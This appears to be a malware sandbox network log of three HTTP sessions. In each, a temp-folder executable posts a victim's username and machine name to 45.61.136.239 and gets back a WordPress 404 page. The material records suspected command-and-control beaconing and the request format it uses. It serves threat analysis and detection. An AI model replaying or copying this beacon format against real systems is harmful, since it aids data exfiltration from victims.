Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:33.104567051 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:33.109364986 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:36.302592993 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:33 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:36.302637100 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:36.302650928 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:36.302683115 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:36.302692890 CEST	896	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:36.302711964 CEST	1236	IN	Data Raw: 75 6f 74 65 20 63 69 74 65 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 20 66 6f 6f 74 65 72 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 31 32 35 65 6d 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e Data Ascii: uote cite,.wp-block-quote footer{color:currentColor;font-size:.8125em;font-style:normal;position:relative}.wp-block-quote.has-text-align-right{border-left:none;border-right:.25em solid;padding-left:0;padding-right:1em}.wp-block-quote.has-text-
Jul 4, 2024 08:23:36.302932978 CEST	1236	IN	Data Raw: 65 6f 20 66 69 67 63 61 70 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 23 35 35 35 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 2e 77 70 2d 62 6c 6f 63 6b Data Ascii: eo figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-video figcaption{color:#ffffffa6}.wp-block-video{margin:0 0 1em}.wp-block-template-part.has-background{margin-bottom:0;margin-top:0;padding:1.25em 2.375em}</st
Jul 4, 2024 08:23:36.302943945 CEST	448	IN	Data Raw: 75 65 2d 74 6f 2d 76 69 76 69 64 2d 70 75 72 70 6c 65 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 61 28 36 2c 31 34 37 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 Data Ascii: ue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminou
Jul 4, 2024 08:23:36.302963018 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:36.302982092 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:36.450860023 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:36.456634045 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:39.542069912 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:36 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:39.542093039 CEST	1236	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height
Jul 4, 2024 08:23:39.542113066 CEST	1236	IN	Data Raw: 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 6f 5b 65 5d 3d 74 Data Ascii: textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["
Jul 4, 2024 08:23:39.542258978 CEST	1236	IN	Data Raw: 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 29 3b 6e 2e 73 75 70 70 6f 72 Data Ascii: orts.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).th
Jul 4, 2024 08:23:39.542269945 CEST	1236	IN	Data Raw: 6f 72 64 65 72 3a 31 70 78 20 73 6f 6c 69 64 20 23 63 63 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 4d 65 6e 6c 6f 2c 43 6f 6e 73 6f 6c 61 73 2c 6d 6f 6e 61 63 6f 2c 6d 6f 6e 6f 73 70 61 63 65 Data Ascii: order:1px solid #ccc;border-radius:4px;font-family:Menlo,Consolas,monaco,monospace;padding:.8em 1em}.wp-block-embed figcaption{color:#555;font-size:13px;text-align:center}.is-dark-theme .wp-block-embed figcaption{color:#ffffffa6}.wp-block-embe
Jul 4, 2024 08:23:39.542288065 CEST	1236	IN	Data Raw: 77 70 2d 62 6c 6f 63 6b 2d 71 75 6f 74 65 2e 69 73 2d 73 74 79 6c 65 2d 70 6c 61 69 6e 7b 62 6f 72 64 65 72 3a 6e 6f 6e 65 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 20 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 61 72 63 68 5f 5f 6c 61 62 65 6c Data Ascii: wp-block-quote.is-style-plain{border:none}.wp-block-search .wp-block-search__label{font-weight:700}.wp-block-search__button{border:1px solid #ccc;padding:.375em .625em}:where(.wp-block-group.has-background){padding:1.25em 2.375em}.wp-block-sep
Jul 4, 2024 08:23:39.542301893 CEST	1236	IN	Data Raw: 20 2a 2f 0a 2e 77 70 2d 62 6c 6f 63 6b 2d 62 75 74 74 6f 6e 5f 5f 6c 69 6e 6b 7b 63 6f 6c 6f 72 3a 23 66 66 66 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 Data Ascii: */.wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text
Jul 4, 2024 08:23:39.542489052 CEST	108	IN	Data Raw: 30 2c 31 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 75 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 74 6f 2d 76 69 76 69 64 2d 72 65 64 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 Data Ascii: 0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0
Jul 4, 2024 08:23:39.542510986 CEST	1236	IN	Data Raw: 2c 31 29 20 30 25 2c 72 67 62 28 32 30 37 2c 34 36 2c 34 36 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 76 65 72 79 2d 6c 69 67 68 74 2d 67 72 61 79 2d 74 6f 2d 63 79 61 6e 2d 62 6c 75 69 73 68 Data Ascii: ,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%
Jul 4, 2024 08:23:39.542607069 CEST	1236	IN	Data Raw: 3a 20 30 2e 36 37 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 34 30 3a 20 31 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 70 61 63 69 6e 67 2d 2d 35 30 3a 20 31 2e 35 72 65 6d 3b 2d 2d 77 70 2d 2d Data Ascii: : 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	45.61.136.239	80	2212	C:\Users\user\AppData\Local\Temp\Slringsnettets.exe

Timestamp	Bytes transferred	Direction	Data
Jul 4, 2024 08:23:39.706239939 CEST	263	OUT	POST /index.php/posts.php?file=1951649854775 HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.61.136.239 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 4310752 Content-Length: 149 Connection: close
Jul 4, 2024 08:23:39.711560011 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 39 00 36 00 30 00 37 00 38 00 31 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones960781JONES-PC0FDD42EE188E931437F4FBE2C
Jul 4, 2024 08:23:42.700489044 CEST	1236	IN	HTTP/1.0 404 Not Found Date: Thu, 04 Jul 2024 06:23:40 GMT Server: Apache/2.4.52 (Ubuntu) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <http://45.61.136.239/index.php/wp-json/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 47 6f 6c 64 65 6e 20 73 68 69 70 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <title>Page not found – Golden ship</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="Golden ship » Feed" href="http://45.61.136.239/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="Golden ship » Comments Feed" href="http://45.61.136.239/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ /window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.61.136.239\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.5"}};/! This
Jul 4, 2024 08:23:42.700503111 CEST	224	IN	Data Raw: 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74 3d 7b 73 75 70 70 6f Data Ascii: file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.wi
Jul 4, 2024 08:23:42.700522900 CEST	1236	IN	Data Raw: 64 74 68 2c 65 2e 63 61 6e 76 61 73 2e 68 65 69 67 68 74 29 2c 65 2e 66 69 6c 6c 54 65 78 74 28 74 2c 30 2c 30 29 3b 76 61 72 20 74 3d 6e 65 77 20 55 69 6e 74 33 32 41 72 72 61 79 28 65 2e 67 65 74 49 6d 61 67 65 44 61 74 61 28 30 2c 30 2c 65 2e Data Ascii: dth,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canv
Jul 4, 2024 08:23:42.700556040 CEST	224	IN	Data Raw: 74 69 6e 67 73 53 75 70 70 6f 72 74 73 22 2c 73 3d 5b 22 66 6c 61 67 22 2c 22 65 6d 6f 6a 69 22 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 3d 7b 65 76 65 72 79 74 68 69 6e 67 3a 21 30 2c 65 76 65 72 79 74 68 69 6e 67 45 78 63 65 70 74 46 6c 61 67 3a 21 Data Ascii: tingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.pars
Jul 4, 2024 08:23:42.700577974 CEST	1236	IN	Data Raw: 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65 73 74 61 6d 70 26 26 Data Ascii: e(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"un
Jul 4, 2024 08:23:42.700619936 CEST	224	IN	Data Raw: 3b 0a 2f 2a 20 5d 5d 3e 20 2a 2f 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 0a 09 69 6d Data Ascii: ;/* ... */</script><style id='wp-emoji-styles-inline-css' type='text/css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;w
Jul 4, 2024 08:23:42.700689077 CEST	1236	IN	Data Raw: 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 6d 61 72 67 69 6e 3a 20 30 20 30 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 Data Ascii: idth: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}</style><link rel='stylesheet' id='wp-block-library-css' href='http://45.61.136.239/wp-includ
Jul 4, 2024 08:23:42.700779915 CEST	224	IN	Data Raw: 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 20 66 6f 6f 74 65 72 2c 2e 77 70 2d 62 6c 6f 63 6b 2d 70 75 6c 6c 71 75 6f 74 65 5f 5f 63 69 74 61 74 69 6f 6e 7b 63 6f 6c 6f 72 3a 63 75 72 72 65 6e 74 43 6f 6c 6f 72 3b 66 6f 6e 74 2d Data Ascii: ,.wp-block-pullquote footer,.wp-block-pullquote__citation{color:currentColor;font-size:.8125em;font-style:normal;text-transform:uppercase}.wp-block-quote{border-left:.25em solid;margin:0 0 1.75em;padding-left:1em}.wp-block-q
